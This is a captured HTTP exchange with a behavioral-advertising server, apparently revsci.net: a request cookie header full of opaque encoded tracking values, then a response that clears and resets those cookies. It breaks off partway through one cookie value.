NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LKjcZyqckugFnBiR0Zn/IsFdk0/rFRTV9qpAPalIhg6ctdKRDh0s/thiFDr8zSnOiJzdlLV+GP4C0aP3dFLRyc6fD3eGZF5paPafjW8xN/6f61iDbn5Scf4ENowP7/1SoiwONbYeu6xZ2hfIMUOAP0wYi5HYzKJgrBhF1IX9Zd5O2Lmz0H8o1YhUZ/xNsWLqnbPSclagg1uZdIaEEX2X7mU9PpvkuJOErL8VIsMtmNeV8SkFkjFUOet0KGm5k8I/lS57L9061i+BOKKiB821tSxmzJvLeZjNqwNOktGg05gpiheC/gX34NVB3rHtCa9gdCWhoGBjXZ3Vek0xPaJoM2vQggaeofJWjtEizseUAZ8DqB3Bpvl+Q/ml47cZ0lKw7LawXyD58UNXC+2xj1oRnibe6D3B6lsMl4e22RyFZmDR/wOywu2mQO0J9hOUdK+nxEJozkuDVSbShPypBC8wJaxkeC1d41hzQM4nFlVLgxRcm5VUb+1qf+/lRdlarNizuUBS3eo7geSrmwmp6exVCwVOlj2Jj9fP7BnHPXwJ6dP7KZGbHV8En9dfBTXYwWNTvYgYB0GCPL/kkLLy6LUuk48I5Z8DCPCP3tSYk5a3xRXRYElTnYs44OJZ5L5mDPYj0iANpHQO1GLTP1KwhMnVobAuCAHWLm+4VbxffA3CBtNvKLlD/eF/gh5Wod9cqvBiz1hWTb4ij8COotPmMZcvatmS+hAlW9NvQ+GlR3LFrwx9U+2LONu5piZm6OS4EGsv1cip2BRmgE3yUIBr0q2bfQHwV8zdQzhThHV+MbBRAr2AebL+QcAIdxhTgx7JRKxi78B2nJxMoeJWcbPhr/XUIFqDTIthwHCAaAOn7NcAgDUsPznPOHwK62Y2m2wTSVt2bLefzLQrJsgwvV1ckk6OEkoK+K+oMHP390MTlJ6WZKDNPwPIitLRLuNkCr4NNOtgTNHeOehpjGXbCJn/lx1EAfOT9CRrt/F7ACN11dFiLoKmLbYt+lGtiaDq8E1KHPwNqbKR4pWoNzDoCopSiRYRtZD0Ft8IVgJioAjQ13lkHzlURVaOS50U7/4pN4X6i+A+lEz9OikZ1cOVXnRB9R6iyRafnQwrF/CtuR2+gMIjH7yc8soS/mvr9OcOyaNc6cmvTvza7q7WzE7OVGXcqHdC7x6MOkpZyDWhdtS0/OngDWbqYoAwJYpdiyIl1ijllxC4BtQR1dQ98cyYX/4NTwupjWmJACf4Kiw2z+NZXDXEseCmsCSBnARs0RKdPBkBBp7hjHFHKYmmSu9f6e+2ou02jTP8i1fC0GiKn8WlIPQl+P88osPPlstYfuy1877JO+Aq2okYoZqHk/ZQlwR8xUD9RPH8bTf7BU+eXH3xJq0K22dYC5plTYC4BgxUGVWnSwaeyypAv2r+561/B3gCB3gWwWPSZUvs76UJtUVeF7CblPshXTNoZC0YBMuVqFveGNrPuHEXdO0eMCUFxC6EBHId3CNr1Mt5iGiBtNQ=="; rsi_us_1000000="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"; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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; udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hyOzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="MLsXtSMNJjhrJoHUG+rUxPALFPJgvaBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdgJmKm6Uzd+LKsNG9Nr+xb5hoDyIfWhw+AyVQ7u11QLOtzj88u2n9J3K7ReVCPIvh9QMt5DFcvzlWMwCQvebSXlqBAu2RernYAut1MCCV+q/24tw8FoIns/41iDbl7Tc65k6owP7f1eoi+MNbYeWmxZ2RSLSYsDJNVQhhlNlJBAYEQF1IX1fd5O2Lmz0H8o2YtUGzzNsWDIWBrTWenygUIPDIJza9mSq5LtgFoZie4Hj3cJkAASzZoXwejzlDel0cIF7Nybl2UsRTpgSCmcFnLdXIuQ8IiNoLTsPSbI4Yk9w0JKlK27ANpZihZ8/gX34NVR3rHtGa9gdEXZoGBjTf3VemUxRaBoL2vsgAaapfJWjhEizwWUAZsCaP3Bpvruf9ml4bcV0lOwZ6CxPLllW4JquG25Q8PZJub/bTnsWl/VPYGAvcSmXrrZ6IfdMlOAgTHwqZpxEDWGetOJWcFU5WXDn011Ocm7Oe2u9u7U3oBT7zW0MkxEoljqgdc6+7iVt3JwiOqCp3z5+h765zGr4E7B2hemzCGc8uRNtFU6nVK6iLkJy/sbS9yCIPHt+kA7HPfKFzlVvvhfT5GEJC8d9k0L5HCK82AdG4DpU4jOLpz07oKE6KfI6shEnGVMS4HHVVMWxIXGO61OhqXJleJLqCZdo/qJCaxceZ2/AneMa5dtZs3KD3uYQ9JhE9xqB1z7MdKfw4jqStKoC9TdaqXKT6Qpz14fRuCG5BdQjUz1OAuhWlbBuStygfcRLEvRx1Tr/dIWvpUV6mLVQ2HfVUrDKbpSy4WCFLn1yFEnJmyCBXj6CIDHFqm6dP+wjDF3IvmS8r0RVoLD+Xy4UwfJU9LO2O2uCzhfzYvJ6DlP0TyLCI08pGxvusn7MQhu6f8d+gwSO/wuAlFYKT4gUi536pSBPlffZ+hYuM4LUHXumDVUnEne+ZI8wqsnEOkZAf3YdxE2ucgy23gzDtyO/Gv5pknmXVtj5N8GtkD/7XGQ94udBr6Q0l7c3OtvYiqqrnjvE0cRjpWrVvhQ2lPK6bzZhUIz5rSjO6mGN9iCFTTYIeHp0i6Wd6L3jx3qSvh1BESO4AnMK3UDVokDXUESIeawx0wJ70+Jf+OCqte1J/xCixn0kPPZtX3R1QOASxlFw7tJXCNHE0YAW1SuwZeCr52n2uScW8peTuZdaeJn1V9th/CutD/BoEKJv/sFD047122a4o37IufAKNr+54TDtq6hx3mqrEsr7nkWsH0DhRw1lRiFuj4un3R+HDtLIDTsQV9tiJOKFJalV7v/t8CUmO6hrRuJMiFizHlAoUEPQJdMMfuwHZoBBcANP6yjQFTzNHF1HdwzXNsRsiW/dMEjRRfFhZEzzfzMA9Cit6Qj3G77OtyJ+IAtHlJNHMbL5DLxV6e+aDFjLgewz82pakSKJ8ceMMN66JOjNu7zcFjAeOvApEPMygQJzdeWxoaCEj8g/93w9n/jjGmhiSVQ7Dc2KZfhwLdD8hp1Zf5yu2M2ZWMg0IqWeINRtZJw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4i2jMIYZ7ES1kb10eZfVkVm7iIJZBa5Z642kqPytE/lFy+9C7Its0hWRkE8F6vlyBe/9Trz9i3gmy4SmoNYf4RgLJ57l6XK2XM/zpxd+bWfKtBiH1p4PveCiA30MI78vG1slAzQEuI4Pj+v4BdLCmIoU5Yani/TSqHGz6VoMwG4CC7VGiDuesbxiXf2W2Iqk52/xeAS+0Rjlz2nwqJ6CfeZ4xISeLhfuygLAPAlgi3xGkXLZ5wezJstSrtcZvJqS5DcF4vEdvh0cSV7drZl3996CIo/lAKkqMjpJoN9EOahRHkbj76DE8ADMQwfo3txn/IZhZGxYdBlwhaEDOB+aFAWS+uNtb19XpabQhu5AgMMrXDR0tbd/Z4AveSJ+//M8i8Fp6O8tP7EwsqdbWF6A3E+uXrpIU5e5W8VMBQA2jr39wIlmH0e0a3kexbltOd9lpf9D/gz8AiZPbvNt3jaqCsnewupAsprKHp30HU9z7PEnSz2LIFkh2SycQUEy/0oeQ6kpjiC3Y7zkrhJNI5oheGtAtEZtSsH2km/NN0qMzYyTvrwurIlgwZfHcq642qtp0HAFYBszyc5HRY7z27QXKawd5eqdAiwI1sNzUV8GYgkzytrqTth+eZJtOkV6DgxzVxlrXY+5mc2THvCA+ily4O24IMuEnJTXoZmpSgHQD89+2/fVTpN4aqXKNnzDREGGnsEuj+gObqhzbc0jTN6wpjAsV82F6cZgGaajYS1fTcKMVVdcJNbESUizsTti8oky+L2t22c53o8F87DIYOlifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas